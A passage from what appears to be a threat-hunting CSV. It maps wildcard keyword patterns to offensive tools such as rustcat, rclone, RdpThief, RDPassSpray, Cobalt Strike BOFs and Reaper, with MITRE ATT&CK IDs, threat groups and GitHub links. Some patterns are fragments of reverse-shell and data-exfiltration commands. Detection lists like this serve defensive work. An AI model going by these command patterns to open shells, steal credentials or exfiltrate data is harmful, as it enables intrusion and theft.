movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*RBCD_Petitpotam_VulnerableServers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*rbsec/dnscan*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*rc4.py *.bin*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*rcan listen -ib *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat c -s bash *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat connect -s bash*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen 55660*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen -ie *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen -l *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*darwin-aarch64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*-darwin-x86_64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*-linux-x86_64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*RCE-exploits*","offensive_tool_keyword","POC","poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. the samples are uploaded for education purposes for red and blue teams.","T1059.001 - T1210.001 - T1212 - T1055.012","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/smgorelik/Windows-RCE-exploits","1","1","N/A","N/A","8","731","187","2019-07-29T23:28:15Z","2018-02-13T11:23:40Z" +"*rclone copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*rclone.exe config create remote mega user *","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*rclone.exe* copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*rclone.exe* -l * *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","interactive mode","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*RDE1-main.zip*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*rdi_net_user.cpp*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*rdp_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rdp_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RDPassSpray.*.log*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" +"*RDPassSpray.csv*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" +"*RDPassSpray.py*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" +"*RDPassSpray-master*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" +"*rdpbrute.py*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" +"*RDP-Caching.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*RDPCredentialStealer.zip*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*RDPCredentialStealer-main*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*RDPCredsStealerDLL.*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*RDPCredsStealerDLL.dll*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*rdphijack.*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*rdphijack.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*rdphijack.x64.*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*rdphijack.x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*rdphijack.x86.*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*RDPHijack-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*RDPHijack-BOF*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*RDPInception*","offensive_tool_keyword","RDPInception","A proof of concept for the RDP Inception Attack","T1188 - T1214 - T1076 - T1555.003","TA0007 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/RDPInception","1","1","N/A","N/A","4","338","677","2017-06-29T16:57:25Z","2017-06-29T10:08:23Z" +"*rdpscraper*","offensive_tool_keyword","rdpscraper","rdpscraper - Enumerates users based off RDP Screenshots","T1110 - T1189 - T1056.001","TA0006 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/x90skysn3k/rdpscraper","1","1","N/A","N/A","1","34","15","2023-10-03T21:05:48Z","2017-07-19T17:02:24Z" +"*RDPSpray*","offensive_tool_keyword","RDPSpray","Tool for password spraying RDP","T1110.001 - T1555.002","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/dafthack/RDPSpray","1","1","N/A","N/A","1","89","40","2018-10-12T18:32:51Z","2018-10-12T18:29:52Z" +"*RdpThief*","offensive_tool_keyword","RdpThief","RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process. will perform API hooking. extract the clear-text credentials and save them to a file. An aggressor script accompanies it. which is responsible for managing the state. monitoring for new processes and injecting the shellcode in mstsc.exe. The DLL has been converted to shellcode using the sRDI project (https://github.com/monoxgas/sRDI). When enabled. RdpThief will get the process list every 5 seconds. search for mstsc.exe. and inject to it","T1055 - T1547 - T1059 - T1078","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","1014","503","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" +"*RdpThief.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*rdrleakdiag.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*read_cs_teamserver*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*readShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*ReadyToPhish.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*RealBey/ThisIsNotRat*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" +"*realgam3*","offensive_tool_keyword","Github Username","github user Security Researcher @F5Networks hosting reverse tools and other pentester tools for data exfiltration and password attacks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/realgam3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Real-Passwords*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Reaper.exe kp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*Reaper.exe sp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*Reaper-main.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*rebootuser/LinEnum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*REC2 implant for Mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*REC2 implant for VirusTotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2::modules::rec2mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 